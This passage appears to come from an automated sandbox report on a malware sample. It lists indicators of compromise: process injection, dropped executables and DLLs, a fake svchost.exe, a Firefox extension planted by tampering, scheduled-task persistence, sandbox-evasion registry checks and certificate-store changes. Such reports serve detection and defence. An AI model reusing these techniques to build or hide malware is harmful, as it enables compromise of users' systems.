Sun100a1efe5ce7fc0b.exeSun1043644c2967579d0.exepbooekKg54FmM_Hnq0O0VsHM.exe2nChThzdMr4TJpKUCL8E4CyT.exeTele.exe.pifdescription pid process target process PID 1752 set thread context of 1912 1752 Sun100a1efe5ce7fc0b.exe Sun100a1efe5ce7fc0b.exe PID 4396 set thread context of 516 4396 Sun10e3b1ea69c.exe PID 2728 set thread context of 776 2728 Sun1043644c2967579d0.exe Sun1043644c2967579d0.exe PID 60 set thread context of 5888 60 pbooekKg54FmM_Hnq0O0VsHM.exe pbooekKg54FmM_Hnq0O0VsHM.exe PID 4648 set thread context of 4716 4648 2nChThzdMr4TJpKUCL8E4CyT.exe 2nChThzdMr4TJpKUCL8E4CyT.exe PID 5392 set thread context of 3716 5392 Tele.exe.pif Tele.exe.pif -
Drops file in Program Files directory 25 IoCs
Processes:
o7KJUaxa5gaD8f7BIm2pqaH6.exeWMuLq3PFEFKhhywunmEUHY44.exejg1_1faf.exePDYHMwz.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o7KJUaxa5gaD8f7BIm2pqaH6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe WMuLq3PFEFKhhywunmEUHY44.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PDYHMwz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PDYHMwz.exe File created C:\Program Files (x86)\bQZEOuyekqRU2\HcyXcSzoXECWJ.dll PDYHMwz.exe File created C:\Program Files (x86)\GuXKuCyCeSmjC\OAPwZVE.dll PDYHMwz.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\wjTkFrExU\kNGrWrf.xml PDYHMwz.exe File created C:\Program Files (x86)\bQZEOuyekqRU2\iITSsnE.xml PDYHMwz.exe File created C:\Program Files (x86)\uAhcATovcXckvYCnvyR\bupoZQn.xml PDYHMwz.exe File created C:\Program Files (x86)\lSmWvXKKfqUn\OnjLvui.dll PDYHMwz.exe File created C:\Program Files (x86)\uAhcATovcXckvYCnvyR\RrEqSTx.dll PDYHMwz.exe File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\wjTkFrExU\cXSoEW.dll PDYHMwz.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PDYHMwz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PDYHMwz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PDYHMwz.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o7KJUaxa5gaD8f7BIm2pqaH6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe WMuLq3PFEFKhhywunmEUHY44.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini WMuLq3PFEFKhhywunmEUHY44.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File created C:\Program Files (x86)\GuXKuCyCeSmjC\bMdVuXB.xml PDYHMwz.exe -
Drops file in Windows directory 17 IoCs
Processes:
svchost.execompattelrunner.exeschtasks.exeschtasks.exeschtasks.exeTiWorker.exeZB0OKZSL_hIHTo_URFkZ8yyp.exeschtasks.exesvchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File created C:\Windows\rescache\_merged\1910676589\227395627.pri compattelrunner.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File created C:\Windows\Tasks\pyIEiyMuPIzAvWAZz.job schtasks.exe File created C:\Windows\Tasks\LMrvZmpowwChRBgra.job schtasks.exe File created C:\Windows\Tasks\WcTeBRgOXLrCFSZ.job schtasks.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File created C:\Windows\System\xxx1.bak ZB0OKZSL_hIHTo_URFkZ8yyp.exe File opened for modification C:\Windows\System\svchost.exe ZB0OKZSL_hIHTo_URFkZ8yyp.exe File created C:\Windows\Tasks\bnkqNuphAZeBTHhYMc.job schtasks.exe File created C:\Windows\System\xxx1.bak svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File created C:\Windows\System\svchost.exe ZB0OKZSL_hIHTo_URFkZ8yyp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2352 4652 WerFault.exe setup_install.exe 4024 4628 WerFault.exe Sun10e55122fb.exe 4156 1912 WerFault.exe Sun100a1efe5ce7fc0b.exe 5988 4252 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe 6044 5224 WerFault.exe X7p8DAJapV2plcOlRWrUMceZ.exe 2696 5240 WerFault.exe sIpIp8e47BP1VcHVARCfUine.exe 5324 5240 WerFault.exe sIpIp8e47BP1VcHVARCfUine.exe 3688 4252 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe 5564 4252 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe 3012 5224 WerFault.exe X7p8DAJapV2plcOlRWrUMceZ.exe 1684 4252 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe 5308 1012 WerFault.exe 5600 6068 WerFault.exe jZ0C0q_MJ7VhtEj9FBPpKVeK.exe 5260 3904 WerFault.exe gItz_jO0wn5_clLVmhUgb743.exe 3876 4252 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe 5972 6068 WerFault.exe jZ0C0q_MJ7VhtEj9FBPpKVeK.exe 5832 4616 WerFault.exe tQ2rXUWRH10IT3jetzqneWop.exe 5512 3716 WerFault.exe Tele.exe.pif -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Sun10cb78a30b1eccca7.exedwm.exearwubatdescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun10cb78a30b1eccca7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arwubat Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun10cb78a30b1eccca7.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun10cb78a30b1eccca7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arwubat Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arwubat -
Checks processor information in registry 2 TTPs 44 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeSun10c76e04e6f57.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Sun10c76e04e6f57.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Sun10c76e04e6f57.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5552 schtasks.exe 3496 schtasks.exe 3388 schtasks.exe 5928 schtasks.exe 4904 schtasks.exe 2412 schtasks.exe 5860 schtasks.exe 4764 schtasks.exe 5012 schtasks.exe 5568 schtasks.exe 6024 schtasks.exe 1132 schtasks.exe 5020 schtasks.exe 5812 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 6024 tasklist.exe 5384 tasklist.exe -
Enumerates system info in registry 2 TTPs 34 IoCs
Processes:
WerFault.exedwm.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 6028 taskkill.exe 3552 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
rundll32.exepowershell.exepowershell.execompattelrunner.exedwm.exePDYHMwz.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AsyncTextService_8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CPrintDialog%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CWindows.CBSPreview_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.creddialoghost_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.ECApp_8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PDYHMwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1385018a-0000-0000-0000-d01200000000}\MaxCapacity = "15140" PDYHMwz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" PDYHMwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FilePicker_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.XGpuEjectDialog_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" PDYHMwz.exe -
Modifies registry class 8 IoCs
Processes:
IZSCvb_J2727vxUXl0geMMpf.exeVRTW_12CdurcHkoz22bAhYDD.exeStartMenuExperienceHost.exeSun1069185a7827c7.exeSun103e58edca733.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings IZSCvb_J2727vxUXl0geMMpf.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings VRTW_12CdurcHkoz22bAhYDD.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings Sun1069185a7827c7.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings Sun103e58edca733.exe -
Processes:
Roads.exeSun10e4f04359b3ed33c.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c4469